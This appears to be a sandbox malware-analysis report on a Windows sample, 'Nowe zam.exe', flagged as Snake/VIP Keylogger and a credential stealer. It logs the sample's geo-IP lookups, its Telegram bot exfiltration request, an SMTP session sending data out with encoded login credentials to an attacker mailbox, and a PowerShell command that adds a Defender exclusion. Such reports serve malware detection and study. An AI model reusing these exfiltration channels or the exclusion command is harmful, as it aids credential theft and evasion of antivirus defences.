2024-11-07 11:49:15 UTC	63	OUT	GET /xml/173.254.250.79 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-07 11:49:15 UTC	1213	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:15 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38 x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 23333 Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zI0WqIx7l%2Bk50ZVjBj7ZKUHz6NSvthod7MKmJRyR0M349IhKibEO3NvC3k1cWNlWpRvEZbTDtRHI6qdIjzatZ1eAlLi170HPNw5BGGDFHW6NwfbcbGWByGG29nqZpcAjlXqS72Mw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded19516d5b4689-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1165&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2477331&cwnd=251&unsent_bytes=0&cid=4134970c74e33361&ts=149&x=0"
2024-11-07 11:49:15 UTC	156	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
2024-11-07 11:49:15 UTC	203	IN	Data Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.12	49726	188.114.96.3	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 11:49:16 UTC	87	OUT	GET /xml/173.254.250.79 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-07 11:49:16 UTC	1219	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:16 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38 x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 23334 Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xNCG8sr3iW5cVU9KfpS%2FszpLUwdOCRNbrq9MGu21Mt7y5AtEDzEOboeWTtZKlnVwSqaaFlgsmwu7Z5hCMHz2%2BbRDH3F9iX0GXA96SCSZ4cX3k0WJ%2FXO%2FyDEgNGgBt2kBeHNPGR5l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded195baa98e78a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2159582&cwnd=237&unsent_bytes=0&cid=3d66cd67f3947147&ts=355&x=0"
2024-11-07 11:49:16 UTC	150	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-07 11:49:16 UTC	209	IN	Data Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.12	49728	188.114.96.3	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 11:49:18 UTC	87	OUT	GET /xml/173.254.250.79 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-07 11:49:18 UTC	1217	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:18 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38 x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 23336 Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1M5BkSn2b%2BMsGyoXMRxMuvMdUzt3qPeo9TFv38y0J5ISCaVATlc2NGcBDigFH3ejSM96oPAB7dD5udjYs1D0Bs%2BtHc0mSnD1yA%2BC1Uc97gLZbO1kAmeXMFrmIAVtMo5awlMx5EB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded1965e8296b38-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1092&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2212375&cwnd=251&unsent_bytes=0&cid=46e9331f56793b34&ts=149&x=0"
2024-11-07 11:49:18 UTC	152	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
2024-11-07 11:49:18 UTC	207	IN	Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.12	49730	188.114.96.3	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 11:49:19 UTC	87	OUT	GET /xml/173.254.250.79 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-07 11:49:19 UTC	1219	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:19 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38 x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 23337 Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuOnoQucPCU%2FrZr3CB%2BD2zcOkAslut6qV5bLOoa0%2ByCsmVdoekxNzmdILM06IqEgusONt%2BwCeUmati7ZOyFEzXfsv78Dvveek9OxJC4bCyJ4cX2ahf6k3SHDgnrlisin8gVHKvbr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded196eab41e75e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1887874&cwnd=251&unsent_bytes=0&cid=d442763031eaaa32&ts=144&x=0"
2024-11-07 11:49:19 UTC	150	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-07 11:49:19 UTC	209	IN	Data Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.12	49732	188.114.96.3	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 11:49:21 UTC	87	OUT	GET /xml/173.254.250.79 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-07 11:49:21 UTC	1215	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:21 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38 x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 23339 Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jWjh1hGZUWnMj89kWGiTU9AOw6atyrZOl9iNxZOFhZ2Oh9fb46lnLNhlmd4lHnjsuE6zNR3bXludflSsK6SO9F8etpRVdj0hGLVQwdb%2BT56Ph4%2BADNASbuN9zA1hGYXZDlOqPb81"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded197749e64796-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1137&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2498705&cwnd=244&unsent_bytes=0&cid=8ab8cc6d5b2a972d&ts=147&x=0"
2024-11-07 11:49:21 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-11-07 11:49:21 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.12	49733	149.154.167.220	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 11:49:22 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2007/11/2024%20/%2019:53:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-07 11:49:22 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 07 Nov 2024 11:49:22 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-07 11:49:22 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 7, 2024 12:49:29.313038111 CET	587	49741	212.44.112.138	192.168.2.12	220-rcp-43.controlpanel.si ESMTP Exim 4.96.2 #2 Thu, 07 Nov 2024 12:49:29 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 7, 2024 12:49:29.313397884 CET	49741	587	192.168.2.12	212.44.112.138	EHLO 783875
Nov 7, 2024 12:49:29.576176882 CET	587	49741	212.44.112.138	192.168.2.12	250-rcp-43.controlpanel.si Hello 783875 [173.254.250.79] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 7, 2024 12:49:29.576847076 CET	49741	587	192.168.2.12	212.44.112.138	AUTH login c3BsZXRuYXN0cmFuQHRsYWtvdmVjLnNp
Nov 7, 2024 12:49:29.839657068 CET	587	49741	212.44.112.138	192.168.2.12	334 UGFzc3dvcmQ6
Nov 7, 2024 12:49:30.143505096 CET	587	49741	212.44.112.138	192.168.2.12	235 Authentication succeeded
Nov 7, 2024 12:49:30.143800974 CET	49741	587	192.168.2.12	212.44.112.138	MAIL FROM:<spletnastran@tlakovec.si>
Nov 7, 2024 12:49:30.406229973 CET	587	49741	212.44.112.138	192.168.2.12	250 OK
Nov 7, 2024 12:49:30.415463924 CET	49741	587	192.168.2.12	212.44.112.138	RCPT TO:<straitjohn249@gmail.com>
Nov 7, 2024 12:49:30.688939095 CET	587	49741	212.44.112.138	192.168.2.12	250 Accepted
Nov 7, 2024 12:49:30.689158916 CET	49741	587	192.168.2.12	212.44.112.138	DATA
Nov 7, 2024 12:49:31.224680901 CET	587	49741	212.44.112.138	192.168.2.12	354 Enter message, ending with "." on a line by itself
Nov 7, 2024 12:49:31.225303888 CET	587	49741	212.44.112.138	192.168.2.12	354 Enter message, ending with "." on a line by itself
Nov 7, 2024 12:49:31.226243973 CET	49741	587	192.168.2.12	212.44.112.138	.
Nov 7, 2024 12:49:31.506182909 CET	587	49741	212.44.112.138	192.168.2.12	250 OK id=1t9110-0002rD-2e
Nov 7, 2024 12:51:07.816234112 CET	49741	587	192.168.2.12	212.44.112.138	QUIT
Nov 7, 2024 12:51:08.280977011 CET	587	49741	212.44.112.138	192.168.2.12	221 rcp-43.controlpanel.si closing connection

Target ID:	0
Start time:	06:49:05
Start date:	07/11/2024
Path:	C:\Users\user\Desktop\Nowe zam.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Nowe zam.exe"
Imagebase:	0x180000
File size:	878'080 bytes
MD5 hash:	D29C5FB95585ED107D8473D204D520AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:49:06
Start date:	07/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"
Imagebase:	0x920000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:49:06
Start date:	07/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x840000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	06:49:06
Start date:	07/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	243
Total number of Limit Nodes:	17

Executed Functions

Function 04B1DEE8 Relevance: .7, Instructions: 651COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b63fb363dd53074149c644efa04373808b3aae5e9fe23ede4d93bce0ac968a7
Instruction ID: b8d4fd41bb19019fd449308ac772baba86bad1c4d6030a44a1a7d270158d879d
Opcode Fuzzy Hash: 1b63fb363dd53074149c644efa04373808b3aae5e9fe23ede4d93bce0ac968a7
Instruction Fuzzy Hash: B442F634701610CFDB29AF78C55866A7BE2FF89305B5444AEE90ADB360DE36EC42CB51

Function 090D59B8 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892cb3b9a337dc0c5f0e848b9a6c2597a2ce6a80d32b2d239ff45dd907b53fe1
